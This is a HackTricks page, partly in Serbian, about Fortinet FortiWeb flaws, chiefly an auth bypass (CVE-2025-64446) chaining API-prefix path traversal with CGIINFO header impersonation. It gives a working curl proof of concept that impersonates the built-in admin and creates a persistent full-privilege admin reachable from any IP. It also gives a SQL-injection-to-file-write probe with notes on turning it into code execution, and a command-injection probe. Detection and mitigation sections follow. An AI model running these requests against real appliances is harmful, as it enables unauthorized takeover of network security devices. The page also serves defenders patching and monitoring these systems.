Fortinet FortiWeb — Auth bypass via API-prefix traversal and CGIINFO impersonation

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Pregled

Fortinet FortiWeb izlaže centralizovani CGI dispatcher na /cgi-bin/fwbcgi. Lanac od dva buga omogućava neautentifikovanom udaljenom napadaču da:

  • Reach fwbcgi by starting the URL with a valid API prefix and traversing directories.
  • Impersonate any user (including the built-in admin) by supplying a special HTTP header that the CGI trusts as identity.

Vendor advisory: FG‑IR‑25‑910 (CVE‑2025‑64446). Zloupotreba je primećena u napadima u stvarnom svetu i korišćena za kreiranje perzistentnih admin korisnika.

Pogođene verzije (prema javno dostupnoj dokumentaciji):

  • 8.0 < 8.0.2
  • 7.6 < 7.6.5
  • 7.4 < 7.4.10
  • 7.2 < 7.2.12
  • 7.0 < 7.0.12
  • 6.4 ≤ 6.4.3
  • 6.3 ≤ 6.3.23

FortiWeb 8.0.2 returns HTTP 403 for the traversal probe below.

Brza provera ranjivosti

  • Path traversal from API prefix to fwbcgi:
GET /api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: <target>
  • Tumačenje: HTTP 200 → verovatno ranjiv; HTTP 403 → ispravljen.

Root cause chain

  1. API-prefix path traversal to internal CGI
  • Bilo koji request path koji počinje validnim FortiWeb API prefiksom (npr. /api/v2.0/cmdb/ ili /api/v2.0/cmd/) može da izvrši path traversal pomoću ../ do /cgi-bin/fwbcgi.
  1. Minimal-body validation bypass
  • Kada se dođe do fwbcgi, prvi filter obavlja permisivnu JSON proveru zasnovanu na datoteci po putanji pod /var/log/inputcheck/. Ako datoteka ne postoji, provera odmah prolazi. Ako postoji, telo zahteva samo treba da bude validan JSON. Koristite {} kao minimalno prihvatljivo telo.
  1. Header-driven user impersonation
  • Program čita CGI environment promenljivu HTTP_CGIINFO (izvedenu iz HTTP headera CGIINFO), dekodira je iz Base64, parsira JSON i kopira atribute direktno u login kontekst, postavljajući domain/VDOM. Ključevi od interesa:
  • username, loginname, vdom, profname
  • Primer JSON-a za impersonaciju ugrađenog admina:
{
"username": "admin",
"profname": "prof_admin",
"vdom": "root",
"loginname": "admin"
}

Base64 gore navedenog (kako se koristi u realnom svetu):

eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==

End-to-end obrazac zloupotrebe (neautentifikovani → admin)

  1. Pristupite /cgi-bin/fwbcgi preko API-prefix traversal.
  2. Pošaljite bilo koji validan JSON body (npr. {}) da zadovolji proveru unosa.
  3. Pošaljite header CGIINFO: <base64(json)> gde JSON definiše identitet mete.
  4. Pošaljite POST sa backend JSON-om koji fwbcgi očekuje da izvrši privilegovane akcije (npr. kreiranje admin naloga za trajni pristup).

Minimalni cURL PoC

  • Ispitajte traversal izloženost:
curl -ik 'https://<host>/api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi'
  • Impersonate admin i kreirajte novog local admin user:
# Base64(JSON) for admin impersonation
B64='eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ=='

curl -ik \
-H "CGIINFO: $B64" \
-H 'Content-Type: application/json' \
-X POST \
--data '{"data":{"name":"watchTowr","access-profile":"prof_admin","access-profile_val":"0","trusthostv4":"0.0.0.0/0","trusthostv6":"::/0","type":"local-user","type_val":"0","password":"P@ssw0rd!"}}' \
'https://<host>/api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi'

Napomene:

  • Bilo koji validan JSON sadržaj je dovoljan (npr. {}) ako /var/log/inputcheck/<path>.json ne postoji.
  • Shema akcije je FortiWeb-internal; primer iznad dodaje lokalnog admina sa punim privilegijama.

Ostale FortiWeb 2025. ranjivosti koje vredi brzo proveriti

Pre-auth Fabric Connector SQLi → RCE (CVE-2025-25257)

  • Pogađa verzije 7.6.0–7.6.3, 7.4.0–7.4.7, 7.2.0–7.2.10, 7.0.0–7.0.10. Ispravljeno u 7.6.4 / 7.4.8 / 7.2.11 / 7.0.11.
  • Greška: get_fabric_user_by_token() koristi vrednost Authorization: Bearer <token> direktno u SQL upitu. Napadač ubacuje SQL koji se izvršava kao MySQL korisnik i može da upiše fajlove putem SELECT ... INTO OUTFILE, što dovodi do izvršavanja koda (webshell/.pth loader).
  • Tipična površina napada: /api/fabric/device/status (i drugi Fabric Connector endpoints) preko HTTP/HTTPS na management plane.
  • Brzi test za SQLi:
curl -sk -X POST \
-H "Authorization: Bearer ' UNION SELECT NULL,NULL,NULL,NULL INTO OUTFILE '/data/var/tmp/pwn.txt' -- -" \
https://<host>/api/fabric/device/status
  • Weaponizacija: write a .pth into FortiWeb’s Python site-packages that imports os;os.system(...) on interpreter start, or drop a CGI under the webroot. Reloading services will execute the payload.
  • Tragovi za otkrivanje: Authorization headers containing quotes/UNION/SELECT; unexpected files under /data/lib/python*/site-packages/ or /data/var/waf/html/ROOT/cgi-bin/.

FortiCloud SSO signature bypass (CVE-2025-59719)

  • Improper SAML signature verification lets an attacker forge FortiCloud SSO responses and log in as admin with no credentials.
  • Only exploitable when FortiCloud SSO login is enabled (it turns on automatically if the appliance was registered via GUI unless the checkbox was unticked).
  • Affected (per PSIRT): 8.0.0, 7.6.0–7.6.4, 7.4.0–7.4.9. Patched in 8.0.1 / 7.6.5 / 7.4.10.

OS command injection in management plane (CVE-2025-58034)

  • Affected: 7.0.0–7.0.11, 7.2.0–7.2.11, 7.4.0–7.4.10, 7.6.0–7.6.5, 8.0.0–8.0.1. Fixed in 7.0.12 / 7.2.12 / 7.4.11 / 7.6.6 / 8.0.2.
  • Practical probe (non-destructive): send a parameter containing ;id; to management HTTP endpoints and watch for 500 responses with command output; block or patch immediately if any echo is seen.

Detection

  • Requests reaching /cgi-bin/fwbcgi via API-prefix paths containing ../ (e.g., /api/v2.0/cmdb/.../../../../../../cgi-bin/fwbcgi).
  • Presence of header CGIINFO with Base64 JSON containing keys username/loginname/vdom/profname.
  • Fabric Connector SQLi: Authorization headers containing SQL metacharacters, sudden files in Python site-packages/CGI dirs, hits to /api/fabric/device/status from internet IPs.
  • FortiCloud SSO: unexpected SAML issuers or audience values in /var/log/ssod.
  • Backend artifacts:
  • Per-path files under /var/log/inputcheck/ (gate configuration).
  • Unexpected admin creation and configuration changes.
  • Rapid validation: the traversal probe returning 200 (exposed) vs 403 (blocked in fixed builds).

Mitigation

  • Upgrade to fixed releases (examples: 8.0.2, 7.6.5, 7.4.10, 7.2.12, 7.0.12) per vendor advisory.
  • Patch the other 2025 flaws: SQLi (7.6.4/7.4.8/7.2.11/7.0.11), SSO bypass (8.0.1/7.6.5/7.4.10), command injection (7.6.6/7.4.11/7.2.12/7.0.12/8.0.2).
  • Until patched:
  • Do not expose FortiWeb management plane to untrusted networks.
  • Add reverse-proxy/WAF rules to block:
  • Paths that start with /api/ and contain ../cgi-bin/fwbcgi.
  • Requests carrying a CGIINFO header.
  • Fabric Connector calls with SQL metacharacters in Authorization.
  • SAML endpoints from the internet if FortiCloud SSO is unused.
  • Monitor and alert on the detection indicators above.

References

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks